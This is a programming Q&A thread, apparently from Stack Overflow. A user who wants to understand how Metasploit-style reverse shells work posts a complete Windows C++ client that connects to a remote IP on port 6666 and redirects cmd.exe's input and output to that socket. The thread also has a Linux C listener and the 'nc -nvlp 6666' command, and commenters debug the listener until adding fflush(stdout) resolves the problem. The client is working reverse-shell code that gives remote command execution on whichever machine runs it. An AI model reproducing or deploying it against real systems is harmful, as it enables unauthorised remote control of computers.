# How can I create a netcat type listener using C?

Tags: c, linux, sockets

I know that it's possible to open a reverse tcp connection using metasploit but I wanted to write my own code to see what really happens. I have reached as far as creating both the server and client myself. The client(runs on windows) opens a connection to the server(runs on Linux terminal).

So far, I have been able to establish a connection between the two and also managed to have the client call CreateProcess with the STARTUPINFO handles pointing to where the socket is connected. The problem lies in having the cmd run in Linux terminal like it would with Metasploit or netcat.

The client has no issues since when I create a listener with netcat, the cmd is opened as soon as the client creates a connection. However, using a listener I've written(in C), it doesn't open the terminal.

Following are the code snippets from the code I am using.

**listener.c** ( runs on Linux )

```
// listening on port 6666 for connection from anywhere
// used to accept client socket
int c_sock=-1;
socklen_t themsize=sizeof(struct sockaddr_in);
// store client information here
them=(struct sockaddr_in*)malloc(themsize);
if( ( c_sock=accept(sock, (struct sockaddr*)them, &themsize) )==-1 )
    diep("accept");

printf("connection from %s:%d\n", inet_ntoa(them->sin_addr), htons(them->sin_port));

int bytes_rcvd=0;
char *recv_buf=NULL;

// recv_buf will recv up to 1024 bytes
recv_buf=(char*)malloc(sizeof(char)*BUFLEN);
while( 1 )
{
    bytes_rcvd=recv(c_sock, recv_buf, BUFLEN, 0);
    if( bytes_rcvd<0 )
    {
        break;
    }
    // reaches here
    // print what we received
    // i don't know how to go on from here
    // what commands should i send back to spawn a cmd shell?
    // this is printed by the server
    /*
    Microsoft Windows [Version 10.0.14393]
    (c) 2016 Microsoft Corporation. All rights reserved.  
    */
    // missing is the rest of the cmd where to write commands
    printf("%s", recv_buf);
}

close(sock);
```

**Ps. Linux is running on a virtual machine**

**client.cpp** ( runs on windows )

```
#define WIN32_LEAN_AND_MEAN

#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>

#pragma comment (lib, "ws2_32.lib")

int main()
{
    WSADATA wsaData;
    SOCKET si;
    struct sockaddr_in hax;
    char ip_addr[16];
    STARTUPINFO sui;
    PROCESS_INFORMATION pi;

    WSAStartup(MAKEWORD(2, 2), &wsaData);
    si=WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);

    hax.sin_family=AF_INET;
    hax.sin_port=htons(6666);
    // the x.x.x.x is replaced with the ip I am connecting to
    hax.sin_addr.s_addr=inet_addr("x.x.x.x");

    if( WSAConnect(si, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL)!=0 )
    {
        printf("%d\n", WSAGetLastError());
        getchar();
        exit(-1);
    }

    memset(&sui, 0, sizeof(sui));
    sui.cb=sizeof(sui);
    sui.dwFlags=(STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
    sui.hStdInput=sui.hStdOutput=sui.hStdError=(HANDLE)si;

    char *cmdline="cmd.exe";
    CreateProcess(NULL, cmdline, NULL, NULL, TRUE, 0, NULL, NULL, &sui, &pi);

    WaitForSingleObject(pi.hProcess, INFINITE);
    CloseHandle(pi.hProcess);

    getchar();
    return 0;
}
```

Finally, the client when connected to a netcat listener opens up a cmd on linux. The netcat command I use is as follows

```
nc -nvlp 6666
```

[image: output from netcat]

[image: output from my listener]

Comment: have you grabbed the source for `netcat`?

Comment: no, netcat is builtin for linux..i use the same client.cpp to connect to netcat when i open a listener..

Comment: While netcat may or may not be available on a default installation of linux all of the source for all of your linux distribution is available for download.  Hence, open source.

Comment: Your question is very poorly framed. No `netcat` does *not* "open up a cmd on linux". It simply passes its standard input and standard output to/from the socket. It appears that you're really trying to launch a `cmd.exe` window on the windows side. If that works with `netcat` but not with your server, then the `WSAConnect` is either hanging or failing. We cannot help you diagnose that because (a) you haven't told us which is happening [and error code if any], and (b) you haven't shown the critical part of your server: the `bind` on your listening socket.

Comment: @GilHamilton, I mentioned in the question the output that is given by the server, it doesn't fail, everything works up until the message indicated in the comments, that is the message given by my server. The only part that stops is the final line where I actually get a cmd in my server which is running on linux.

Comment: I've added images showing the output from `netcat` and `mylistener`..

Comment: It's still not clear what you *expect* to happen. So it looks like `cmd.exe` is already running. But `cmd.exe` *is* the shell on windows. So you just need to send it some commands? If you intend your server to work just like `nc` then you will need to read from your standard input and write that data to the connected socket. (And BTW being able to respond to input on either the standard input or the socket will require use of `select` or multiple threads.)

Comment: One other thing. You're not seeing the `C:\ ` but I suspect that is because it doesn't end in a newline. And `printf` is ordinarily line-buffered (so that "partial line" is sitting in the `stdout` buffer). You would need to `fflush(stdout)` after your `printf` to ensure you see partial lines.

Comment: oh, i am able to read from `stdin` on linux. The issue as you can see is the whole `C:\>` line. @GilHamilton, i did the whole fflush(stdout) and now i can see the expected output, i think the rest would simply be a matter of reading and writing to the socket the commands. I believe you answered the question..

Answer (score 0):

You're not seeing the `C:\`  but I suspect that is because it doesn't end in a newline. And `printf` is ordinarily line-buffered (so that "partial line" is sitting in the `stdout` buffer). You would need to `fflush(stdout)` after your `printf` to ensure you see partial lines.
                    – Gil Hamilton